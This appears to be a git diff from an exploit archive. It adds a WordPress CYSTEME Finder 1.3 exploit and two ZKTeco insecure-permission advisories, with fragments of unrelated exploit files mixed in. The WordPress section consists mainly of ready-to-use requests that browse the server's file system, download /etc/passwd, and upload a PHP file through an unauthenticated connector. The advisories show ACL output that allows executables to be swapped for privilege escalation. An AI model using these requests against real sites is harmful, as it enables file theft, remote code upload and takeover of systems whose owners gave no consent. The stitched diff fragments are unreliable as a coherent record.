# Exploit Author: Raschin Tavakoli, Bernhard Garn, Peter Aufner and Dimitris Simos - Combinatorial Security Testing Group of SBA Research (cst@sba-research.org)
|
||||
|
|
119
platforms/php/webapps/40295.txt
Executable file
119
platforms/php/webapps/40295.txt
Executable file
|
@ -0,0 +1,119 @@
|
|||
Exploit Title: WordPress CYSTEME Finder Plugin 1.3 - Arbitrary File Dislcosure/Arbitrary File Upload
|
||||
Link: https://wordpress.org/plugins/cysteme-finder/
|
||||
Version: 1.3
|
||||
Date: August 23rd 2016
|
||||
Exploit Author: T0w3ntum
|
||||
Author Website: t0w3ntum.com
|
||||
|
||||
### SUMMARY
|
||||
|
||||
CYSTEME Finder is an admin file manager plugin for wordpress that fails to check cookie data in the request
|
||||
to http://server/wp-content/plugins/cysteme-finder/php/connector.php
|
||||
|
||||
This allows attackers to upload, download, and browse the remote file system.
|
||||
|
||||
### LFI
|
||||
|
||||
- Retrieve all data in the root wordpress directory. This will return JSON.
|
||||
Exploit:
|
||||
http://server/wp-content/plugins/cysteme-finder/php/connector.php?wphome=/var/www/wordpress&cmd=open&init=1&tree=1
|
||||
|
||||
Reply:
|
||||
{
|
||||
"cwd": {
|
||||
"mime": "directory",
|
||||
"ts": 1471999484,
|
||||
"read": 1,
|
||||
"write": 1,
|
||||
"size": 0,
|
||||
"hash": "l1_Lw",
|
||||
"volumeid": "l1_",
|
||||
"name": "Fichiers du site",
|
||||
"date": "Today 20:44",
|
||||
"locked": 1,
|
||||
"dirs": 1
|
||||
},
|
||||
"options": {
|
||||
"path": "Fichiers du site",
|
||||
"url": null,
|
||||
"tmbUrl": "",
|
||||
"disabled": [
|
||||
|
||||
],
|
||||
"separator": "\/",
|
||||
"copyOverwrite": 1,
|
||||
"archivers": {
|
||||
"create": [
|
||||
"application\/x-tar",
|
||||
"application\/x-gzip",
|
||||
"application\/x-bzip2"
|
||||
],
|
||||
"extract": [
|
||||
"application\/x-tar",
|
||||
"application\/x-gzip",
|
||||
"application\/x-bzip2",
|
||||
"application\/zip"
|
||||
]
|
||||
}
|
||||
},
|
||||
"files": [
|
||||
{
|
||||
"mime": "directory",
|
||||
"ts": 1471999484,
|
||||
"read": 1,
|
||||
"write": 1,
|
||||
"size": 0,
|
||||
"hash": "l1_Lw",
|
||||
"volumeid": "l1_",
|
||||
"name": "Fichiers du site",
|
||||
"date": "Today 20:44",
|
||||
"locked": 1,
|
||||
"dirs": 1
|
||||
},
|
||||
{
|
||||
"mime": "text\/plain",
|
||||
"ts": 1471714510,
|
||||
"read": 1,
|
||||
"write": 1,
|
||||
"size": 813,
|
||||
"hash": "l1_Lmh0YWNjZXNz",
|
||||
"name": ".htaccess",
|
||||
"phash": "l1_Lw",
|
||||
"date": "20 Aug 2016 13:35"
|
||||
},
|
||||
|
||||
Simply replacing wphome with any other directory path will return file information for that directory.
|
||||
If you want to download that file, get the hash value for the file and include it in the following request:
|
||||
|
||||
Will download /etc/passwd
|
||||
http://server/wp-content/plugins/cysteme-finder/php/connector.php?wphome=/etc&cmd=file&target=l1_cGFzc3dk&download=1
|
||||
|
||||
### File Upload
|
||||
|
||||
As with downloading the files, you will need the hash value for the target directory. With the hash value, send a payload similar to the following.
|
||||
|
||||
POST /wordpress/wp-content/plugins/cysteme-finder/php/connector.php?wphome=/var/www/wordpress/&wpurl=http://server HTTP/1.1
|
||||
Host: http://server
|
||||
Content-Length: 314
|
||||
Origin: http://server
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36
|
||||
Content-Type: multipart/form-data; boundary=--------723608748
|
||||
Accept: */*
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept-Language: en-US,en;q=0.8
|
||||
Connection: close
|
||||
|
||||
----------723608748
|
||||
Content-Disposition: form-data; name="cmd"
|
||||
|
||||
upload
|
||||
----------723608748
|
||||
Content-Disposition: form-data; name="target"
|
||||
|
||||
l1_Lw
|
||||
----------723608748
|
||||
Content-Disposition: form-data; name="upload[]"; filename="test.php"
|
||||
Content-Type: text/html
|
||||
|
||||
<?php phpinfo(); ?>
|
||||
----------723608748--
|
|
@ -1,4 +1,4 @@
|
|||
#!/usr/bin/perl
|
||||
#!/usr/bin/perl
|
||||
# Stack overflow in wininet.dll while parsing huge( > ~1M) Content-Type response
|
||||
# ex.: Unhandled exception at 0x771c00ee in IEXPLORE.EXE: 0xC00000FD: Stack overflow.
|
||||
#
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
/*
|
||||
/*
|
||||
|
||||
by Luigi Auriemma
|
||||
|
||||
|
|
112
platforms/windows/local/40322.txt
Executable file
112
platforms/windows/local/40322.txt
Executable file
|
@ -0,0 +1,112 @@
|
|||
ZKTeco ZKTime.Net 3.0.1.6 Insecure File Permissions
|
||||
|
||||
|
||||
Vendor: ZKTeco Inc. | Xiamen ZKTeco Biometric Identification Technology Co.,ltd
|
||||
Product web page: http://www.zkteco.com
|
||||
Affected version: 3.0.1.6
|
||||
3.0.1.5 (160622)
|
||||
3.0.1.1 (160216)
|
||||
|
||||
Summary: ZKTime.Net V3.0 is a new generation time attendance
|
||||
management software. Meanwhile, it integrates with time attendance
|
||||
and access control system. Some frequently used functions such as
|
||||
attendance reports, device management and employee management can
|
||||
be managed directly on the home page which providing excellent user
|
||||
experience. Owing to the Pay code function, it can generate both
|
||||
time attendance records and corresponding payroll in the software
|
||||
and easy to merge with the most ERP and Payroll software, which can
|
||||
rapidly upgrade your working efficiency. The brand new flat GUI design
|
||||
and humanized structure will make your daily management more pleasant
|
||||
and convenient.
|
||||
|
||||
Desc: ZKTime.Net suffers from an elevation of privileges vulnerability
|
||||
which can be used by a simple user that can change the executable file
|
||||
with a binary of choice. The vulnerability exist due to the improper
|
||||
permissions, with the 'C' flag (Change) for 'Everyone' group, making the
|
||||
entire directory 'ZKTimeNet3.0' and its files and sub-dirs world-writable.
|
||||
|
||||
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
|
||||
Microsoft Windows 7 Professional SP1 (EN)
|
||||
|
||||
|
||||
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||
@zeroscience
|
||||
|
||||
|
||||
Advisory ID: ZSL-2016-5360
|
||||
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5360.php
|
||||
|
||||
|
||||
18.07.2016
|
||||
|
||||
--
|
||||
|
||||
|
||||
C:\>showacls "c:\Program Files (x86)\ZKTimeNet3.0"
|
||||
c:\Program Files (x86)\ZKTimeNet3.0
|
||||
Everyone Change [RWXD]
|
||||
NT SERVICE\TrustedInstaller Special Access [A]
|
||||
NT AUTHORITY\SYSTEM Special Access [A]
|
||||
BUILTIN\Administrators Special Access [A]
|
||||
BUILTIN\Users Special Access [RX]
|
||||
CREATOR OWNER Special Access [A]
|
||||
|
||||
|
||||
C:\>showacls "c:\Program Files (x86)\ZKTimeNet3.0\ZKTimeNet.exe"
|
||||
c:\Program Files (x86)\ZKTimeNet3.0\ZKTimeNet.exe
|
||||
Everyone Change [RWXD]
|
||||
|
||||
|
||||
|
||||
C:\Program Files (x86)>cacls ZKTimeNet3.0
|
||||
C:\Program Files (x86)\ZKTimeNet3.0 Everyone:(OI)(CI)C
|
||||
NT SERVICE\TrustedInstaller:(ID)F
|
||||
NT SERVICE\TrustedInstaller:(CI)(IO)(ID)F
|
||||
NT AUTHORITY\SYSTEM:(ID)F
|
||||
NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(ID)F
|
||||
BUILTIN\Administrators:(ID)F
|
||||
BUILTIN\Administrators:(OI)(CI)(IO)(ID)F
|
||||
BUILTIN\Users:(ID)R
|
||||
BUILTIN\Users:(OI)(CI)(IO)(ID)(special access:)
|
||||
GENERIC_READ
|
||||
GENERIC_EXECUTE
|
||||
|
||||
CREATOR OWNER:(OI)(CI)(IO)(ID)F
|
||||
|
||||
|
||||
C:\Program Files (x86)\ZKTimeNet3.0>cacls *.exe
|
||||
C:\Program Files (x86)\ZKTimeNet3.0\LanguageTranslate.exe Everyone:C
|
||||
Everyone:(ID)C
|
||||
NT AUTHORITY\SYSTEM:(ID)F
|
||||
BUILTIN\Administrators:(ID)F
|
||||
BUILTIN\Users:(ID)R
|
||||
|
||||
C:\Program Files (x86)\ZKTimeNet3.0\unins000.exe Everyone:(ID)C
|
||||
NT AUTHORITY\SYSTEM:(ID)F
|
||||
BUILTIN\Administrators:(ID)F
|
||||
BUILTIN\Users:(ID)R
|
||||
|
||||
C:\Program Files (x86)\ZKTimeNet3.0\ZKTimeNet.DBTT.exe Everyone:C
|
||||
Everyone:(ID)C
|
||||
NT AUTHORITY\SYSTEM:(ID)F
|
||||
BUILTIN\Administrators:(ID)F
|
||||
BUILTIN\Users:(ID)R
|
||||
|
||||
C:\Program Files (x86)\ZKTimeNet3.0\ZKTimeNet.exe Everyone:C
|
||||
Everyone:(ID)C
|
||||
NT AUTHORITY\SYSTEM:(ID)F
|
||||
BUILTIN\Administrators:(ID)F
|
||||
BUILTIN\Users:(ID)R
|
||||
|
||||
C:\Program Files (x86)\ZKTimeNet3.0\ZKTimeNet.Update.exe Everyone:C
|
||||
Everyone:(ID)C
|
||||
NT AUTHORITY\SYSTEM:(ID)F
|
||||
BUILTIN\Administrators:(ID)F
|
||||
BUILTIN\Users:(ID)R
|
||||
|
||||
C:\Program Files (x86)\ZKTimeNet3.0\ZKTimeNet.ZKTime5DB.exe Everyone:C
|
||||
Everyone:(ID)C
|
||||
NT AUTHORITY\SYSTEM:(ID)F
|
||||
BUILTIN\Administrators:(ID)F
|
||||
BUILTIN\Users:(ID)R
|
||||
|
49
platforms/windows/local/40323.txt
Executable file
49
platforms/windows/local/40323.txt
Executable file
|
@ -0,0 +1,49 @@
|
|||
ZKTeco ZKAccess Professional 3.5.3 Insecure File Permissions
|
||||
|
||||
|
||||
Vendor: ZKTeco Inc. | Xiamen ZKTeco Biometric Identification Technology Co.,ltd
|
||||
Product web page: http://www.zkteco.com
|
||||
Affected version: 3.5.3 (Build 0005)
|
||||
|
||||
Summary: ZKAccess 3.5 is a desktop software which is suitable
|
||||
for small and medium businesses application. Compatible with
|
||||
all ZKAccess standalone reader controllers, the software can
|
||||
simultaneously manage access control and generate attendance
|
||||
report. The brand new flat GUI design and humanized structure
|
||||
of new ZKAccess 3.5 will make your daily management more pleasant
|
||||
and convenient.
|
||||
|
||||
Desc: ZKAccess suffers from an elevation of privileges vulnerability
|
||||
which can be used by a simple authenticated user that can change the
|
||||
executable file with a binary of choice. The vulnerability exist due
|
||||
to the improper permissions, with the 'M' flag (Modify) for 'Authenticated Users'
|
||||
group.
|
||||
|
||||
|
||||
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
|
||||
Microsoft Windows 7 Professional SP1 (EN)
|
||||
|
||||
|
||||
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||
@zeroscience
|
||||
|
||||
|
||||
Advisory ID: ZSL-2016-5361
|
||||
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5361.php
|
||||
|
||||
|
||||
18.07.2016
|
||||
|
||||
--
|
||||
|
||||
|
||||
C:\ZKTeco>icacls ZKAccess3.5
|
||||
ZKAccess3.5 BUILTIN\Administrators:(I)(F)
|
||||
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
|
||||
NT AUTHORITY\SYSTEM:(I)(F)
|
||||
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
|
||||
BUILTIN\Users:(I)(OI)(CI)(RX)
|
||||
NT AUTHORITY\Authenticated Users:(I)(M)
|
||||
NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M)
|
||||
|
||||
Successfully processed 1 files; Failed processing 0 files
|
Loading…
Add table
Reference in a new issue